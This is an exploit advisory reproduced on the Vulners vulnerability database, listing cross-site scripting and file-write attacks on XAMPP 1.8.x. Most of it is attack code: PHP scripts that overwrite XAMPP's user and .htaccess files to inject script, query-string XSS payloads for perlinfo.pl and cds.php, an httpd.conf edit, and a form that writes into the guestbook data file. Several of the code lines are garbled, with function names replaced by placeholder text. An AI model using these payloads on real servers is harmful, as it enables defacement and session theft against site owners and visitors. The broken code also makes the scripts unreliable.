Vulners
Lucene search
XAMPP 1.8.x Multiple Vulnerabilities
#Exploit Name : XAMPP 1.8.x Multiple Vulnerabilities
#Author : DevilScreaM
#Date : 6 October 2014
#Vendor : http://bitnami.com
#Version : 1.8.x or Higher Version
#Operating System : Windows / Linux
#Vulnerability : Cross Site Scripting / Write File
#Type : #WebApps #Application
#Tested : Windows 7 64 Bit
#Thanks : Newbie-Security, Indonesian Hacker Team, Indonesia Coder Team, Indonesia Security Team
Cross Site Scripting at perlinfo.pl #1
Perl Version : 5.16.3
Script For Exploit
For Localhost
<?php
$xss = "<script>alert('Tested by DevilScreaM')</script>:";
$f [email protected] ('C:\xampp\security\xampp.users','w');
fwrite($f , $xss);
$htcs = 'AuthName "Username = your Script XSS"
AuthType Basic
AuthUserFile "C:\xampp\security\xampp.users"
require valid-user';
$f1 [email protected] ('C:\xampp\htdocs\xampp\.htaccess','w');
fwrite($f1 , $htcs);
?>
<script>
window.location = "http://127.0.0.1/xampp/perlinfo.pl"
</script>
==================================================================
For Site
<?php
$xss = "<script>alert('Tested by DevilScreaM')</script>:";
$f [email protected] ('my.users','w');
fwrite($f , $xss);
$htcs = 'AuthName "Username = your Script XSS"
AuthType Basic
AuthUserFile "my.users"
require valid-user';
$f1 [email protected] ('.htaccess','w');
fwrite($f1 , $htcs);
$pl = '#!"perl\bin\perl.exe"
use HTML::Perlinfo;
use CGI qw(header);
$q = new CGI;
print $q->header;
$p = new HTML::Perlinfo;
$p->info_general;
$p->info_variables;
$p->info_modules;
$p->info_license;';
$f2 [email protected] ('perlinfo.pl','w');
fwrite(f2 , $pl);
?>
<script>
window.location = "http://site.com/perlinfo.pl"
</script>
==================================================================
Save Script C:\xampp\htdocs\xss.php
Open Browser and Running http://127.0.0.1/xss.php
You Will Redirect to http://127.0.0.1/xampp/perlinfo.pl
Auth Login
Username : <script>alert('Tested by DevilScreaM')</script>
Password :
===================================================================
Cross Site Scripting at perlinfo.pl Query String #2
Exploit :
http://127.0.0.1/xampp/perlinfo.pl?[XSS]
http://127.0.0.1/xampp/perlinfo.pl?[XSS]=[XSS]
Example
http://127.0.0.1/xampp/perlinfo.pl?<script>alert('DevilScreaM')</script>=<script>alert('Newbie-Security')</script>
====================================================================
Cross Site Scripting at http://127.0.0.1/xampp/perlinfo.pl #3
Exploit :
1. Go To Directory C:\xampp\apache\conf\
2. Edit File httpd.conf
3. Go To Line 209
Edit ServerAdmin [email protected] to
ServerAdmin [YOUR XSS]
Example :
ServerAdmin <h1>DevilScreaM</h1>
4. Save File
5. See your XSS at
http://127.0.0.1/xampp/perlinfo.pl
====================================================================
Cross Site Scripting at http://127.0.0.1/Webalizer/
Script for Exploit :
<?php
$xss = "<script>alert('Tested by DevilScreaM')</script>:";
$f [email protected] ('C:\xampp\security\xampp.users','w');
fwrite($f , $xss);
?>
<script>
window.location = "http://127.0.0.1/webalizer/usage_[YEARS][MONTH].html"
</script>
Information :
usage_[YEARS][MONTH].html => usage_201410.html
====================================================================
Save Script Webalizer.php
Command
@echo off
C:\xampp\webalizer\webalizer.exe -c C:\xampp\webalizer\webalizer.conf
PHP
<?php
$webalizer = "C:\xampp\webalizer\webalizer.bat";
system($webalizer);
?>
=====================================================================
Save Script webalizer.cmd or webalizer_run.php
Run Webalizer.cmd and Waiting Process
Result
http://127.0.0.1/webalizer/usage_[years][month].html
Example
http://127.0.0.1/webalizer/usage_201410.html
==================================================================
Cross Site Scripting at cds.php
Exploit :
http://127.0.0.1/xampp/cds.php?interpret=[XSS]
Example :
http://127.0.0.1/xampp/cds.php?interpret=<script>alert('Tested by> DevilScreaM')</script>
====================================================================
Write File Vulnerability
Script to Exploit :
<form action='http://127.0.0.1/xampp/guestbook-en.pl' method='get'>
<table border='0' cellpadding='0' cellspacing='0'>
<tr><td>TEXT:</td>
<td><input type='text' size='30' value='Tested by DevilScreaM' name='f_name'></td></tr>
<tr><td></td><td><input type='submit' value='WRITE'></td></tr>
</table></form>
</br></br>
<a href="http://127.0.0.1/xampp/guestbook.dat"><b>Result</b></a>
==================================================================
Save Script with extension .html
Open Script and Click Write or Change Text
Result
http://127.0.0.1/xampp/guestbook.dat
# 0day.today [2018-04-02] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Oct 2014 00:00Current
7.1High risk
Vulners AI Score7.1